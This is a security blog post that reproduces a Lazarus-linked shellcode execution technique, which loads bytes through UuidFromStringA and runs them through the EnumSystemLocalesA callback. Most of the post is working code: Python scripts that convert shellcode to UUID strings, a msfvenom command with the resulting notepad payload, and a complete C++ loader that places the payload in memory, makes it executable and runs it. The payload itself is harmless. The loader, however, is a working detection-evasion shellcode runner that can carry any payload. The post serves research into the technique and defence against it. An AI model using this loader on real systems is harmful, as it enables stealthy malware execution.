Shellcode Execution via EnumSystemLocalesA
This post covers a shellcode execution technique that leverages the UuidFromStringA and EnumSystemLocalesA APIs to load and execute shellcode.
NCCGroup published an excellent research article covering a mostly unknown shellcode execution technique that was used as part of a campaign believed to be related to the Lazarus Group. The technique uses the UuidFromStringA and EnumSystemLocalesA APIs to load shellcode into memory and then execute it. This approach avoids the use of suspicious API calls such as WriteProcessMemory, CreateThread and VirtualAlloc. The full blog post from NCCGroup can be found here:
The rest of this blog post is about experimenting with the technique covered by NCCGroup. For the most part, it offers no additional insight or information beyond what is already covered in the referenced blog post.
The shellcode execution technique revolves around the following steps:
1. Allocate target memory via HeapAlloc (or VirtualAlloc directly if you wanted to)
2. Use UuidFromStringA to convert UUID strings to their binary format and store the result in memory
3. Use EnumSystemLocalesA to execute the shellcode previously loaded into memory
HeapAlloc is a common API call used to allocate a block of memory on the heap. My understanding of this API is that it allows you to allocate a specific number of bytes from a heap, whereas VirtualAlloc hands out memory in whole pages. However, the documentation suggests that HeapAlloc can still call VirtualAlloc itself if required.
As noted in the NCCGroup blog post, the UuidFromStringA API call:
"Takes a pointer to a UUID, which will be used to return the converted binary data. By providing a pointer to an heap address, this function can be (ab)used to both decode data and write it to memory without using common functions such as memcpy or WriteProcessMemory"
So by calling this API and providing a pointer to a memory address - instead of a pointer to a UUID - the resulting binary representation of the provided UUID will be stored in memory. By chaining a series of calls to this API together and providing specifically crafted UUIDs we can load our desired content (shellcode) into the specified memory region.
To examine how this works, we use the UUIDs used in the NCCGroup blog post as an example and decode them manually. We can run a quick and dirty python script to convert them into their binary representation:
#!/usr/bin/python3
from uuid import UUID

# UUIDs from NCC Blog Post
uuids = [
    "6850c031-6163-636c-5459-504092741551",
    "2f728b64-768b-8b0c-760c-ad8b308b7e18",
    "1aeb50b2-60b2-2948-d465-488b32488b76",
    "768b4818-4810-48ad-8b30-488b7e300357",
    "175c8b3c-8b28-1f74-2048-01fe8b541f24",
    "172cb70f-528d-ad02-813c-0757696e4575",
    "1f748bef-481c-fe01-8b34-ae4801f799ff",
    "000000d7-0000-0000-0000-000000000000",
]

# bytes_le gives the mixed-endian layout that UuidFromStringA writes to memory
with open("/tmp/out.bin", "wb") as output_file:
    for uuid in uuids:
        output_file.write(UUID(uuid).bytes_le)
After running the script and opening the resulting out.bin file in radare2, we can see that it appears to be valid 64-bit shellcode which uses the WinExec API to execute calc.
If you are interested in what this shellcode does line by line, you can find a commented version of the shellcode here.
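The use of bytes_le in the script matters, because a UUID string is not a straight hex dump of the bytes that end up in memory. The first three fields are stored little-endian and the final eight bytes keep the order in which they are written, which matches the layout of the Windows GUID structure that UuidFromStringA fills in. A minimal sketch using the first UUID from the list above (the helper name uuid_to_memory_bytes is hypothetical and not part of the original script):

```python
from uuid import UUID

def uuid_to_memory_bytes(uuid_string):
    """Return the 16 bytes as laid out in a little-endian GUID structure."""
    return UUID(uuid_string).bytes_le

first = "6850c031-6163-636c-5459-504092741551"
raw = uuid_to_memory_bytes(first)

# The 4-byte field and the two 2-byte fields are byte-swapped
print(raw[:4].hex())   # 31c05068
print(raw[4:8])        # b'calc'
# The last 8 bytes keep the order in which they appear in the string
print(raw[8:].hex())   # 5459504092741551
# The big-endian view (bytes) would not reproduce the original byte stream
print(UUID(first).bytes[:4].hex())  # 6850c031
```

The string "calc" only becomes visible once the two 16-bit fields are swapped, which is a quick way to confirm that the little-endian interpretation is the right one.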
Now that we know how the shellcode is loaded into memory from the UUID strings, we can look at how the EnumSystemLocalesA API call is utilised to execute the shellcode.
Looking at the documentation for the API call, we can see that it essentially takes a pointer to a callback function. By providing the memory address of our shellcode, we can use this function to execute it.
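To make the callback contract concrete, here is a rough sketch of the intended, legitimate use of the API: an ordinary function is registered as the callback and the system calls it once per locale. It uses Python's ctypes purely for illustration; the function name list_installed_locales is hypothetical, and on non-Windows systems the sketch simply returns an empty list.

```python
import sys

LCID_INSTALLED = 0x00000001  # enumerate only installed locale identifiers

def list_installed_locales():
    """Collect the locale strings passed to an EnumSystemLocalesA callback."""
    if sys.platform != "win32":
        return []  # the API only exists on Windows

    import ctypes
    from ctypes import wintypes

    seen = []

    # BOOL CALLBACK EnumLocalesProc(LPSTR lpLocaleString)
    proto = ctypes.WINFUNCTYPE(wintypes.BOOL, wintypes.LPSTR)

    def on_locale(locale_string):
        seen.append(locale_string.decode("ascii"))
        return True  # a non-zero return keeps the enumeration going

    callback = proto(on_locale)  # keep a reference alive during the call
    kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
    kernel32.EnumSystemLocalesA.argtypes = [proto, wintypes.DWORD]
    kernel32.EnumSystemLocalesA.restype = wintypes.BOOL
    if not kernel32.EnumSystemLocalesA(callback, LCID_INSTALLED):
        raise ctypes.WinError(ctypes.get_last_error())
    return seen

locales = list_installed_locales()
print(len(locales), locales[:3])
```

The API does nothing to validate what the function pointer refers to; it just calls it, which is the property the technique relies on.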
Now that we know how the technique works, we can pull together some PoC code. However, before we do that we need to be able to convert our desired shellcode into valid UUID strings. Fortunately this is easy to do with the following python code:
#!/usr/bin/python3
from uuid import UUID
import sys

if len(sys.argv) < 2:
    print("Usage: %s <shellcode_file>" % sys.argv[0])
    sys.exit(1)

with open(sys.argv[1], "rb") as f:
    # Read in 16 bytes from our input shellcode
    chunk = f.read(16)
    while chunk:
        # If the chunk is less than 16 bytes then we pad the difference with NOPs
        if len(chunk) < 16:
            padding = 16 - len(chunk)
            chunk = chunk + (b"\x90" * padding)
        # Print each UUID in double quotes
        print('"%s"' % UUID(bytes_le=chunk))
        chunk = f.read(16)
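Before using the converter on real input, it is worth checking that the encoding round-trips. The sketch below is an assumption-laden test harness rather than part of the original tooling: to_uuids and from_uuids are hypothetical helper names, and the input is harmless placeholder data. It mirrors the chunking and padding logic of the script and decodes the result the same way the earlier script did.

```python
from uuid import UUID

def to_uuids(data, pad=b"\x90"):
    """Split data into 16-byte chunks (padding the last) and format as UUIDs."""
    uuids = []
    for offset in range(0, len(data), 16):
        chunk = data[offset:offset + 16]
        chunk += pad * (16 - len(chunk))
        uuids.append(str(UUID(bytes_le=chunk)))
    return uuids

def from_uuids(uuids):
    """Rebuild the byte stream from a list of UUID strings."""
    return b"".join(UUID(u).bytes_le for u in uuids)

sample = bytes(range(20))  # placeholder data, 20 bytes
encoded = to_uuids(sample)
decoded = from_uuids(encoded)

print(len(encoded))                   # 2
print(decoded[:20] == sample)         # True
print(decoded[20:] == b"\x90" * 12)   # True
```

Twenty bytes need two UUIDs, and the second one carries twelve bytes of padding, so the decoded length is always a multiple of 16.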
We can generate some example shellcode, which will execute notepad, by using msfvenom and then converting the shellcode into UUIDs using the Python script above:
$ msfvenom -p windows/exec CMD=notepad -f raw -o /tmp/notepad_shellcode
[-] No platform was selected, choosing Msf::Module::Platform::Windows
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 192 bytes
Saved as: /tmp/notepad_shellcode
$
$ python3 /tmp/convert_to_uuid.py /tmp/notepad_shellcode
"0082e8fc-0000-8960-e531-c0648b50308b"
"528b0c52-8b14-2872-0fb7-4a2631ffac3c"
"2c027c61-c120-0dcf-01c7-e2f252578b52"
"3c4a8b10-4c8b-7811-e348-01d1518b5920"
"498bd301-e318-493a-8b34-8b01d631ffac"
"010dcfc1-38c7-75e0-f603-7df83b7d2475"
"588b58e4-0124-66d3-8b0c-4b8b581c01d3"
"018b048b-89d0-2444-245b-5b61595a51ff"
"5a5f5fe0-128b-8deb-5d6a-018d85b20000"
"31685000-6f8b-ff87-d5bb-f0b5a25668a6"
"ff9dbd95-3cd5-7c06-0a80-fbe07505bb47"
"6a6f7213-5300-d5ff-6e6f-746570616400"
Now that we have our shellcode in UUID format, we can write our PoC code to test:
#include <cstdio>
#include <Windows.h>
#include <Rpc.h>
#pragma comment(lib, "Rpcrt4.lib")

// Print a message with the last Win32 error code and return a failure code
int Error(const char* msg) {
    printf("%s (%lu)\n", msg, GetLastError());
    return 1;
}

int main()
{
    // Shellcode as array of UUIDs
    const char* uuid_arr[] =
    {
        "0082e8fc-0000-8960-e531-c0648b50308b",
        "528b0c52-8b14-2872-0fb7-4a2631ffac3c",
        "2c027c61-c120-0dcf-01c7-e2f252578b52",
        "3c4a8b10-4c8b-7811-e348-01d1518b5920",
        "498bd301-e318-493a-8b34-8b01d631ffac",
        "010dcfc1-38c7-75e0-f603-7df83b7d2475",
        "588b58e4-0124-66d3-8b0c-4b8b581c01d3",
        "018b048b-89d0-2444-245b-5b61595a51ff",
        "5a5f5fe0-128b-8deb-5d6a-018d85b20000",
        "31685000-6f8b-ff87-d5bb-f0b5a25668a6",
        "ff9dbd95-3cd5-7c06-0a80-fbe07505bb47",
        "6a6f7213-5300-d5ff-6e6f-746570616400"
    };

    // Size of the region to allocate (0x2000 bytes, i.e. two 4 KB pages)
    SIZE_T alloc_size = 0x2000;

    // Get a handle to the current process
    // (VirtualQueryEx below also needs PROCESS_QUERY_INFORMATION)
    DWORD pid = GetCurrentProcessId();
    HANDLE proc_handle = OpenProcess(PROCESS_VM_OPERATION | PROCESS_QUERY_INFORMATION, FALSE, pid);
    if (!proc_handle)
        return Error("OpenProcess Failed");

    // Allocate memory in current process to hold our shellcode
    // Initial allocation is PAGE_READWRITE
    void* mem = VirtualAllocEx(proc_handle, NULL, alloc_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!mem) {
        int rc = Error("VirtualAllocEx Failed");
        CloseHandle(proc_handle);
        return rc;
    }

    DWORD_PTR mem_ptr = (DWORD_PTR)mem;

    // Loop through our list of UUIDs and use UuidFromStringA
    // to convert and load into memory
    for (size_t count = 0; count < sizeof(uuid_arr) / sizeof(uuid_arr[0]); count++) {
        RPC_STATUS status = UuidFromStringA((RPC_CSTR)uuid_arr[count], (UUID*)mem_ptr);
        if (status != RPC_S_OK) {
            int rc = Error("UuidFromStringA Failed");
            // mem is not a handle, so release it with VirtualFreeEx
            VirtualFreeEx(proc_handle, mem, 0, MEM_RELEASE);
            CloseHandle(proc_handle);
            return rc;
        }
        mem_ptr += 16;
    }

    MEMORY_BASIC_INFORMATION mem_info;
    // Query the memory region containing our shellcode;
    // mem_info.Protect receives the previous protection below
    VirtualQueryEx(proc_handle, mem, &mem_info, sizeof(mem_info));

    // Use VirtualProtectEx to mark the whole region as executable
    if (!VirtualProtectEx(proc_handle, mem, alloc_size, PAGE_EXECUTE_READ, &mem_info.Protect)) {
        int rc = Error("VirtualProtectEx Failed");
        VirtualFreeEx(proc_handle, mem, 0, MEM_RELEASE);
        CloseHandle(proc_handle);
        return rc;
    }

    // Execute our shellcode using EnumSystemLocalesA
    int rc = 0;
    if (EnumSystemLocalesA((LOCALE_ENUMPROCA)mem, 0) == 0)
        rc = Error("EnumSystemLocalesA Failed");

    VirtualFreeEx(proc_handle, mem, 0, MEM_RELEASE);
    CloseHandle(proc_handle);
    return rc;
}
In the PoC code above we still use OpenProcess, VirtualAllocEx and VirtualProtectEx, which are typically viewed as suspicious. In the Lazarus samples these calls were replaced with a reference to HeapAlloc. The NCCGroup blog post contains code showing how this is done.
Compiling and executing our code shows that the technique works and notepad is launched.
